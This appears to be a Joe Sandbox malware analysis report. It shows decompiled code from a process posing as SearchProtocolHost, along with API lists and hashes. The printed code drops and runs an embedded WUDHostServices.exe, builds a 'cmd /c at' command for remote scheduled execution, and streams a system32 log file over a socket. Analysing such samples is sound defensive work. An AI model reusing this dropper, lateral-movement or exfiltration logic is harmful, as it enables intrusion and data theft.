                                                				E02FA3F90(_t58,  &_v528, "%s\\mkz.output",  &_v788);
                                                				E02FA3F90(_t58,  &_v268, "%s\\WUDHostServices.exe",  &_v788);
                                                				DeleteFileA( &_v528);
                                                				DeleteFileA( &_v268);
                                                				_t57 = FindResourceA(0, 0x65, "BIN");
                                                				if(_t57 == 0) {
                                                					L7:
                                                					DeleteFileA( &_v268);
                                                					DeleteFileA( &_v528);
                                                					return E02FB0A5D(_v8 ^ _t73, _t70);
                                                				}
                                                				_push(_t70);
                                                				_t71 = SizeofResource(0, _t57);
                                                				if(LockResource(LoadResource(0, _t57)) != 0 && _t71 != 0) {
                                                					_t51 = E02FA4E00( &_v268, _t50, _t71);
                                                					_t83 = _t51;
                                                					if(_t51 != 0) {
                                                						_t72 = E02FA4F50( &_v268, 0, _t83, 0);
                                                						if(_t72 != 0) {
                                                							WaitForSingleObject( *_t72, 0x7530);
                                                							_push(0x10);
                                                							E02FB0AA1(_t72);
                                                							E02FA94A0(_t57,  &_v528, _v796, DeleteFileA, _v792);
                                                						}
                                                					}
                                                				}
                                                				_pop(_t70);
                                                				goto L7;
                                                			}

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 02FA97A9
                                                • DeleteFileA.KERNEL32(?), ref: 02FA97EF
                                                • DeleteFileA.KERNEL32(?), ref: 02FA97F8
                                                • FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 02FA9803
                                                • SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 02FA9817
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 02FA9822
                                                • LockResource.KERNEL32(00000000), ref: 02FA9829
                                                  • Part of subcall function 02FA4E00: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,02FA9845), ref: 02FA4E22
                                                  • Part of subcall function 02FA4E00: WriteFile.KERNEL32(00000000,00000000,02FA9845,00000000,00000000,?,02FA9845), ref: 02FA4E39
                                                  • Part of subcall function 02FA4E00: CloseHandle.KERNEL32(00000000,?,02FA9845), ref: 02FA4E44
                                                  • Part of subcall function 02FA4F50: new.LIBCMT ref: 02FA4F6C
                                                  • Part of subcall function 02FA4F50: GetStartupInfoA.KERNEL32(?), ref: 02FA4F8D
                                                  • Part of subcall function 02FA4F50: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,02FA985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 02FA4FBB
                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 02FA986B
                                                • DeleteFileA.KERNEL32(?), ref: 02FA989B
                                                • DeleteFileA.KERNEL32(?), ref: 02FA98A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$DeleteResource$Create$CloseDirectoryFindHandleInfoLoadLockObjectProcessSingleSizeofStartupSystemWaitWrite
                                                • String ID: %s\WUDHostServices.exe$%s\mkz.output$BIN
                                                • API String ID: 3567760449-3573885109
                                                • Opcode ID: 9614184252264b993827e2b94248654e728da1b61ff625f4df89fa05d3a8e803
                                                • Instruction ID: eeaf2629cfa251f11f0280732bb116724f400bb50de8f429012386f4842eed51
                                                • Opcode Fuzzy Hash: 9614184252264b993827e2b94248654e728da1b61ff625f4df89fa05d3a8e803
                                                • Instruction Fuzzy Hash: C43185B5D8031CABDB21EBA0DD49FDAB36DAF04744F5005F5A609E7180DEB0AB948F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E02FAA760(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, struct _SYSTEMTIME _a16, signed short _a24, signed short _a26, short _a30, short _a32, char _a40, char _a80, short _a608, char _a616, char _a624, short _a1120, char _a1128, char _a1664, short _a3712, char _a3720, signed int _a5740, signed int _a5772) {
                                                				void* __esi;
                                                				signed int _t33;
                                                				signed char _t35;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t77;
                                                				WCHAR* _t97;
                                                				void* _t101;
                                                				void* _t103;
                                                				signed int _t104;
                                                				signed int _t105;
                                                
                                                				_t105 = _t104 & 0xfffffff8;
                                                				E02FC3CA0();
                                                				_t33 =  *0x2fcf008; // 0x93ad1eea
                                                				_a5740 = _t33 ^ _t105;
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_t97 = __ecx;
                                                				_t77 = __edx;
                                                				_t35 = GetFileAttributesW(__ecx);
                                                				if(_t35 == 0xffffffff || (_t35 & 0x00000010) == 0) {
                                                					L7:
                                                					_pop(_t101);
                                                					return E02FB0A5D(_a5740 ^ _t105, _t101);
                                                				} else {
                                                					E02FB3440(_t97,  &_a80, 0, 0x208);
                                                					_t105 = _t105 + 0xc;
                                                					E02FAA210(_t97,  &_a80);
                                                					if(E02FAA3B0(_t77,  &_a80,  &_a80, _t97) == 0) {
                                                						goto L7;
                                                					} else {
                                                						E02FB3440(_t97,  &_a1120, 0, 0x208);
                                                						wsprintfW( &_a1120, L"%ws\\%ws",  &_a80, L"Microsoft.ini");
                                                						_t48 = E02FAA630("CONFIGURATION", 0xd,  &_a1128);
                                                						_t105 = _t105 + 0x20;
                                                						if(_t48 == 0) {
                                                							goto L7;
                                                						} else {
                                                							E02FB3440(_t97,  &_a608, 0, 0x208);
                                                							wsprintfW( &_a608, L"%ws\\%ws", _t97, 0x2fd6838);
                                                							_t54 = E02FAA630( *0x2fd6a44,  *0x2fd6a40,  &_a616);
                                                							_t105 = _t105 + 0x20;
                                                							if(_t54 == 0) {
                                                								goto L7;
                                                							} else {
                                                								asm("xorps xmm0, xmm0");
                                                								_a16.wYear = 0;
                                                								_a26 = 0;
                                                								_a30 = 0;
                                                								asm("movq [esp+0x16], xmm0");
                                                								GetLocalTime( &_a16);
                                                								E02FB3440(_t97,  &_a32, 0, 0x40);
                                                								wsprintfW( &_a32, L"%02d:%02d", _a24 & 0x0000ffff, (_a26 & 0x0000ffff) + 3);
                                                								E02FB3440(_t97,  &_a1664, 0, 0x800);
                                                								_t105 = _t105 + 0x28;
                                                								if(E02FAA6C0( &_a624,  &_a1664) == 0) {
                                                									goto L7;
                                                								} else {
                                                									E02FB3440(_t97,  &_a3712, 0, 0x800);
                                                									wsprintfW( &_a3712, L"cmd /c at \\\\%ws %ws \"%ws\"", _t77,  &_a40,  &_a1664);
                                                									E02FAA330( &_a3720);
                                                									_pop(_t103);
                                                									return E02FB0A5D(_a5772 ^ _t105 + 0x20, _t103);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,?,02FD5480,02FD5480,?,02FAAA18), ref: 02FAA786
                                                  • Part of subcall function 02FAA3B0: wsprintfW.USER32 ref: 02FAA3F6
                                                  • Part of subcall function 02FAA3B0: wsprintfW.USER32 ref: 02FAA421
                                                  • Part of subcall function 02FAA3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FAA442
                                                  • Part of subcall function 02FAA3B0: CloseHandle.KERNEL32(00000000), ref: 02FAA454
                                                  • Part of subcall function 02FAA3B0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 02FAA4E7
                                                  • Part of subcall function 02FAA3B0: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 02FAA50A
                                                  • Part of subcall function 02FAA3B0: CloseHandle.KERNEL32(00000000), ref: 02FAA515
                                                • wsprintfW.USER32 ref: 02FAA801
                                                  • Part of subcall function 02FAA630: CreateFileW.KERNEL32(02FAA81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A,?), ref: 02FAA655
                                                • wsprintfW.USER32 ref: 02FAA84F
                                                  • Part of subcall function 02FAA630: WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA67B
                                                  • Part of subcall function 02FAA630: CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA687
                                                • GetLocalTime.KERNEL32(?), ref: 02FAA893
                                                • wsprintfW.USER32 ref: 02FAA8C3
                                                • wsprintfW.USER32 ref: 02FAA925
                                                  • Part of subcall function 02FAA330: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 02FAA384
                                                  • Part of subcall function 02FAA330: WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 02FAA393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Filewsprintf$Create$CloseHandle$Time$AttributesLocalObjectProcessSingleWaitWrite
                                                • String ID: %02d:%02d$%ws\%ws$CONFIGURATION$Microsoft.ini$cmd /c at \\%ws %ws "%ws"
                                                • API String ID: 596974635-589520791
                                                • Opcode ID: 137a9642bf917f661877781c2ed36ef805bf9edcf214b4cb90420a751c4b4988
                                                • Instruction ID: 6f355b65de2ba14cdc6e823d458cfdd598539bbec868796c7c7e4d9886097e8f
                                                • Opcode Fuzzy Hash: 137a9642bf917f661877781c2ed36ef805bf9edcf214b4cb90420a751c4b4988
                                                • Instruction Fuzzy Hash: AF41F7B29483455BD660EB64DD45FDBB3EDAF88744F00092AF788D3180EB71A518CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E02FBFB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                				signed int _v5;
                                                				char _v6;
                                                				void* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v36;
                                                				signed int _v44;
                                                				void _v48;
                                                				char _v72;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t114;
                                                				signed int _t123;
                                                				signed char _t124;
                                                				signed int _t134;
                                                				intOrPtr _t164;
                                                				intOrPtr _t180;
                                                				signed int* _t190;
                                                				signed int _t192;
                                                				char _t197;
                                                				signed int _t203;
                                                				signed int _t206;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t219;
                                                				signed int _t225;
                                                				signed int _t227;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed char _t242;
                                                				intOrPtr _t245;
                                                				void* _t248;
                                                				void* _t252;
                                                				void* _t262;
                                                				signed int _t263;
                                                				signed int _t266;
                                                				signed int _t269;
                                                				signed int _t270;
                                                				void* _t272;
                                                				void* _t274;
                                                				void* _t275;
                                                				void* _t277;
                                                				void* _t278;
                                                				void* _t280;
                                                				void* _t284;
                                                
                                                				_t262 = E02FBF8D9(__ecx,  &_v72, _a16, _a20, _a24);
                                                				_t192 = 6;
                                                				memcpy( &_v48, _t262, _t192 << 2);
                                                				_t274 = _t272 + 0x1c;
                                                				_t248 = _t262 + _t192 + _t192;
                                                				_t263 = _t262 | 0xffffffff;
                                                				if(_v36 != _t263) {
                                                					_t114 = E02FBBF6B(_t248, _t263, __eflags);
                                                					_t190 = _a8;
                                                					 *_t190 = _t114;
                                                					__eflags = _t114 - _t263;
                                                					if(_t114 != _t263) {
                                                						_v20 = _v20 & 0x00000000;
                                                						_v24 = 0xc;
                                                						_t275 = _t274 - 0x18;
                                                						 *_a4 = 1;
                                                						_push(6);
                                                						_v16 =  !(_a16 >> 7) & 1;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t275,  &_v48, 1 << 2);
                                                						_t197 = 0;
                                                						_t252 = E02FBF844();
                                                						_t277 = _t275 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							L11:
                                                							_t123 = GetFileType(_t252);
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t123 - 2;
                                                								if(_t123 != 2) {
                                                									__eflags = _t123 - 3;
                                                									_t124 = _v48;
                                                									if(_t123 == 3) {
                                                										_t124 = _t124 | 0x00000008;
                                                										__eflags = _t124;
                                                									}
                                                								} else {
                                                									_t124 = _v48 | 0x00000040;
                                                								}
                                                								_v5 = _t124;
                                                								E02FBBEB4(_t197,  *_t190, _t252);
                                                								_t242 = _v5 | 0x00000001;
                                                								_v5 = _t242;
                                                								_v48 = _t242;
                                                								 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                                								_t203 =  *_t190;
                                                								_t205 = (_t203 & 0x0000003f) * 0x30;
                                                								__eflags = _a16 & 0x00000002;
                                                								 *((char*)( *((intOrPtr*)(0x2fd6480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                                								if((_a16 & 0x00000002) == 0) {
                                                									L20:
                                                									_v6 = 0;
                                                									_push( &_v6);
                                                									_push(_a16);
                                                									_t278 = _t277 - 0x18;
                                                									_t206 = 6;
                                                									_push( *_t190);
                                                									memcpy(_t278,  &_v48, _t206 << 2);
                                                									_t134 = E02FBF5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                                									_t280 = _t278 + 0x30;
                                                									__eflags = _t134;
                                                									if(__eflags == 0) {
                                                										 *((char*)( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                                										 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                                										__eflags = _v5 & 0x00000048;
                                                										if((_v5 & 0x00000048) == 0) {
                                                											__eflags = _a16 & 0x00000008;
                                                											if((_a16 & 0x00000008) != 0) {
                                                												_t225 =  *_t190;
                                                												_t227 = (_t225 & 0x0000003f) * 0x30;
                                                												_t164 =  *((intOrPtr*)(0x2fd6480 + (_t225 >> 6) * 4));
                                                												_t87 = _t164 + _t227 + 0x28;
                                                												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                                												__eflags =  *_t87;
                                                											}
                                                										}
                                                										_t266 = _v44;
                                                										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                                										if((_t266 & 0xc0000000) != 0xc0000000) {
                                                											L31:
                                                											__eflags = 0;
                                                											return 0;
                                                										} else {
                                                											__eflags = _a16 & 0x00000001;
                                                											if((_a16 & 0x00000001) == 0) {
                                                												goto L31;
                                                											}
                                                											CloseHandle(_v12);
                                                											_v44 = _t266 & 0x7fffffff;
                                                											_t215 = 6;
                                                											_push( &_v24);
                                                											_push(_a12);
                                                											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                                											_t245 = E02FBF844();
                                                											__eflags = _t245 - 0xffffffff;
                                                											if(_t245 != 0xffffffff) {
                                                												_t217 =  *_t190;
                                                												_t219 = (_t217 & 0x0000003f) * 0x30;
                                                												__eflags = _t219;
                                                												 *((intOrPtr*)( *((intOrPtr*)(0x2fd6480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                                												goto L31;
                                                											}
                                                											E02FB5D0D(GetLastError());
                                                											 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                											E02FBC07D( *_t190);
                                                											L10:
                                                											goto L2;
                                                										}
                                                									}
                                                									_t269 = _t134;
                                                									goto L22;
                                                								} else {
                                                									_t269 = E02FBFA55(_t205,  *_t190);
                                                									__eflags = _t269;
                                                									if(__eflags != 0) {
                                                										L22:
                                                										E02FBA32C(__eflags,  *_t190);
                                                										return _t269;
                                                									}
                                                									goto L20;
                                                								}
                                                							}
                                                							_t270 = GetLastError();
                                                							E02FB5D0D(_t270);
                                                							 *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2fd6480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                							CloseHandle(_t252);
                                                							__eflags = _t270;
                                                							if(_t270 == 0) {
                                                								 *((intOrPtr*)(E02FB5D43())) = 0xd;
                                                							}
                                                							goto L2;
                                                						}
                                                						_t234 = _v44;
                                                						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                                						if((_t234 & 0xc0000000) != 0xc0000000) {
                                                							L9:
                                                							_t235 =  *_t190;
                                                							_t237 = (_t235 & 0x0000003f) * 0x30;
                                                							_t180 =  *((intOrPtr*)(0x2fd6480 + (_t235 >> 6) * 4));
                                                							_t33 = _t180 + _t237 + 0x28;
                                                							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                                							__eflags =  *_t33;
                                                							E02FB5D0D(GetLastError());
                                                							goto L10;
                                                						}
                                                						__eflags = _a16 & 0x00000001;
                                                						if((_a16 & 0x00000001) == 0) {
                                                							goto L9;
                                                						}
                                                						_t284 = _t277 - 0x18;
                                                						_v44 = _t234 & 0x7fffffff;
                                                						_t239 = 6;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t284,  &_v48, _t239 << 2);
                                                						_t197 = 0;
                                                						_t252 = E02FBF844();
                                                						_t277 = _t284 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							goto L11;
                                                						}
                                                						goto L9;
                                                					} else {
                                                						 *(E02FB5D30()) =  *_t186 & 0x00000000;
                                                						 *_t190 = _t263;
                                                						 *((intOrPtr*)(E02FB5D43())) = 0x18;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					 *(E02FB5D30()) =  *_t188 & 0x00000000;
                                                					 *_a8 = _t263;
                                                					L2:
                                                					return  *((intOrPtr*)(E02FB5D43()));
                                                				}
                                                			}

                                                0x00000000
                                                0x00000000
                                                0x02fbfe1a
                                                0x02fbfe2c
                                                0x02fbfe34
                                                0x02fbfe37
                                                0x02fbfe38
                                                0x02fbfe3b
                                                0x02fbfe42
                                                0x02fbfe47
                                                0x02fbfe4a
                                                0x02fbfe7e
                                                0x02fbfe88
                                                0x02fbfe88
                                                0x02fbfe92
                                                0x00000000
                                                0x02fbfe92
                                                0x02fbfe53
                                                0x02fbfe6c
                                                0x02fbfe73
                                                0x02fbfc96
                                                0x00000000
                                                0x02fbfc96
                                                0x02fbfe0b
                                                0x02fbfd88
                                                0x00000000
                                                0x02fbfd54
                                                0x02fbfd5b
                                                0x02fbfd5e
                                                0x02fbfd60
                                                0x02fbfd8a
                                                0x02fbfd8c
                                                0x00000000
                                                0x02fbfd92
                                                0x00000000
                                                0x02fbfd60
                                                0x02fbfd52
                                                0x02fbfcad
                                                0x02fbfcb0
                                                0x02fbfccb
                                                0x02fbfcd0
                                                0x02fbfcd6
                                                0x02fbfcd8
                                                0x02fbfce3
                                                0x02fbfce3
                                                0x00000000
                                                0x02fbfcd8
                                                0x02fbfc31
                                                0x02fbfc38
                                                0x02fbfc3a
                                                0x02fbfc71
                                                0x02fbfc71
                                                0x02fbfc7b
                                                0x02fbfc7e
                                                0x02fbfc85
                                                0x02fbfc85
                                                0x02fbfc85
                                                0x02fbfc91
                                                0x00000000
                                                0x02fbfc91
                                                0x02fbfc3c
                                                0x02fbfc40
                                                0x00000000
                                                0x00000000
                                                0x02fbfc42
                                                0x02fbfc51
                                                0x02fbfc56
                                                0x02fbfc59
                                                0x02fbfc5a
                                                0x02fbfc5d
                                                0x02fbfc5d
                                                0x02fbfc64
                                                0x02fbfc66
                                                0x02fbfc69
                                                0x02fbfc6c
                                                0x02fbfc6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fbfbcf
                                                0x02fbfbd4
                                                0x02fbfbd7
                                                0x02fbfbde
                                                0x00000000
                                                0x02fbfbde
                                                0x02fbfba8
                                                0x02fbfbad
                                                0x02fbfbb3
                                                0x02fbfbb5
                                                0x00000000
                                                0x02fbfbba

                                                APIs
                                                  • Part of subcall function 02FBF844: CreateFileW.KERNEL32(00000000,00000000,?,02FBFC1F,?,?,00000000,?,02FBFC1F,00000000,0000000C), ref: 02FBF861
                                                • GetLastError.KERNEL32 ref: 02FBFC8A
                                                • __dosmaperr.LIBCMT ref: 02FBFC91
                                                • GetFileType.KERNEL32(00000000), ref: 02FBFC9D
                                                • GetLastError.KERNEL32 ref: 02FBFCA7
                                                • __dosmaperr.LIBCMT ref: 02FBFCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 02FBFCD0
                                                • CloseHandle.KERNEL32(?), ref: 02FBFE1A
                                                • GetLastError.KERNEL32 ref: 02FBFE4C
                                                • __dosmaperr.LIBCMT ref: 02FBFE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 929cc845d033770e21f3f7b816cc635c65f8a13ab71ee331b0648984467757e6
                                                • Instruction ID: e51a9c197c5568f04b4e4f10ce97df00cf840783b903628f083e0f6f8607530d
                                                • Opcode Fuzzy Hash: 929cc845d033770e21f3f7b816cc635c65f8a13ab71ee331b0648984467757e6
                                                • Instruction Fuzzy Hash: 9CA13332E141498FDF1A9F79DC51BEE7BA1AF0A3A4F140249F912EB291C7349912CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E02FA7980(void* __ebx, void* __edi, intOrPtr _a4) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v102420;
                                                				intOrPtr _v102424;
                                                				intOrPtr* _v102428;
                                                				intOrPtr* _v102432;
                                                				struct _CRITICAL_SECTION _v102456;
                                                				long _v102460;
                                                				long _v102464;
                                                				void* _v102468;
                                                				char _v102472;
                                                				void* __esi;
                                                				signed int _t41;
                                                				signed int _t42;
                                                				void* _t46;
                                                				void* _t60;
                                                				void* _t69;
                                                				intOrPtr* _t89;
                                                				intOrPtr _t90;
                                                				void* _t104;
                                                				void* _t111;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				intOrPtr _t115;
                                                				void* _t116;
                                                				intOrPtr* _t117;
                                                				signed int _t118;
                                                				void* _t119;
                                                				void* _t120;
                                                				void* _t122;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC463B);
                                                				_push( *[fs:0x0]);
                                                				E02FC3CA0();
                                                				_t41 =  *0x2fcf008; // 0x93ad1eea
                                                				_t42 = _t41 ^ _t118;
                                                				_v20 = _t42;
                                                				_push(_t42);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t115 = _a4;
                                                				_v102424 = _t115;
                                                				if(_t115 == 0) {
                                                					L15:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t116);
                                                					return E02FB0A5D(_v20 ^ _t118, _t116);
                                                				}
                                                				_t46 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0);
                                                				_t127 = _t46 - 0xffffffff;
                                                				if(_t46 == 0xffffffff) {
                                                					goto L15;
                                                				}
                                                				CloseHandle(_t46);
                                                				_t89 = E02FB0A6E(_t115, _t127, 0x214);
                                                				_t120 = _t119 + 4;
                                                				_v102432 = _t89;
                                                				 *_t89 = 0x2fccac0;
                                                				E02FA8E80();
                                                				_t111 = 0;
                                                				_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_t115, 0x921e);
                                                				if(_t117 != 0) {
                                                					L5:
                                                					E02FB3440(_t111,  &_v102420, 0, 0x19000);
                                                					_v102472 = 0x2fccab8;
                                                					_v102460 = 0;
                                                					_v102468 = 0;
                                                					_v102464 = 0;
                                                					InitializeCriticalSection( &_v102456);
                                                					_v8 = 0;
                                                					_t112 = E02FB0A6E(_t117, _t130, 0x21c);
                                                					_v102428 = _t112;
                                                					 *_t112 = _t117;
                                                					_t17 = _t112 + 4; // 0x4
                                                					 *(_t112 + 0x214) = 0;
                                                					 *((char*)(_t112 + 0x218)) = 0;
                                                					E02FB3440(_t112, _t17, 0, 0x10c);
                                                					_t20 = _t112 + 0x110; // 0x110
                                                					E02FB5C70(_t20, 0x104, "C:\\Windows\\system32\\msvcwme.log");
                                                					_t122 = _t120 + 0x28;
                                                					_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
                                                					if(_t60 == 0xffffffff) {
                                                						L12:
                                                						 *((intOrPtr*)( *_t117 + 0x18))();
                                                						E02FB0AA1(_t112);
                                                						 *((intOrPtr*)( *_t89))(1, 0x21c);
                                                						 *((intOrPtr*)( *_t117))(1);
                                                						_push(1);
                                                						E02FB0AA1(_v102424);
                                                						_t69 = _v102468;
                                                						_v102472 = 0x2fccab8;
                                                						if(_t69 != 0) {
                                                							VirtualFree(_t69, 0, 0x8000);
                                                						}
                                                						DeleteCriticalSection( &_v102456);
                                                						goto L15;
                                                					}
                                                					_t113 = Sleep;
                                                					_t90 = _v102428;
                                                					do {
                                                						if(_t60 <= 0) {
                                                							goto L10;
                                                						}
                                                						E02FB3440(_t113,  &_v102420, 0, 0x19000);
                                                						_t122 = _t122 + 0xc;
                                                						_push(0x19000);
                                                						_push( &_v102420);
                                                						if( *((intOrPtr*)( *_t117 + 0x14))() <= 0) {
                                                							break;
                                                						}
                                                						E02FA8BB0(_t90, _t90, _t113,  &_v102472,  &_v102420, _t76);
                                                						L10:
                                                						Sleep(0xa);
                                                						_t60 =  *((intOrPtr*)( *_t117 + 0x24))();
                                                					} while (_t60 != 0xffffffff);
                                                					_t89 = _v102432;
                                                					_t112 = _v102428;
                                                					goto L12;
                                                				} else {
                                                					goto L3;
                                                				}
                                                				while(1) {
                                                					L3:
                                                					_t104 = _t111;
                                                					_t111 = _t111 + 1;
                                                					if(_t104 >= 5) {
                                                						break;
                                                					}
                                                					Sleep(0xbb8);
                                                					_t117 =  *((intOrPtr*)( *_t89 + 0xc))(_v102424, 0x921e);
                                                					_t130 = _t117;
                                                					if(_t117 == 0) {
                                                						continue;
                                                					}
                                                					goto L5;
                                                				}
                                                				E02FB0AA1(_v102424);
                                                				 *((intOrPtr*)( *_t89))(1, 1);
                                                				__eflags = _t117;
                                                				if(_t117 != 0) {
                                                					 *((intOrPtr*)( *_t117))(1);
                                                				}
                                                				goto L15;
                                                			}



































                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000,93AD1EEA,?,?,?,?,02FC463B,000000FF), ref: 02FA79D7
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,02FC463B,000000FF), ref: 02FA79E7
                                                • new.LIBCMT ref: 02FA79F2
                                                  • Part of subcall function 02FA8E80: WSAStartup.WS2_32(00000202,93AD1EEA), ref: 02FA8EA3
                                                • Sleep.KERNEL32(00000BB8), ref: 02FA7A33
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA7A96
                                                • new.LIBCMT ref: 02FA7AA8
                                                • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7B59
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7BC4
                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000010C,0000021C), ref: 02FA7BD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSectionSleep$CloseCreateDeleteFileFreeHandleInitializeStartupVirtual
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 1876426310-2357825738
                                                • Opcode ID: 73a8f51a151c4a6d78aeff83f978d6175265fcbf2dbc1b05f45f4175f1cfb409
                                                • Instruction ID: 70d013631c4e77dcd07a4059eb4b3a0e5dbdb152aa867111850c3710c12e28dc
                                                • Opcode Fuzzy Hash: 73a8f51a151c4a6d78aeff83f978d6175265fcbf2dbc1b05f45f4175f1cfb409
                                                • Instruction Fuzzy Hash: ED7165B0B40218AFDB21DF54CD65FDDB7B5AF48B90F1005A9E709AB2D0CB709A448F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
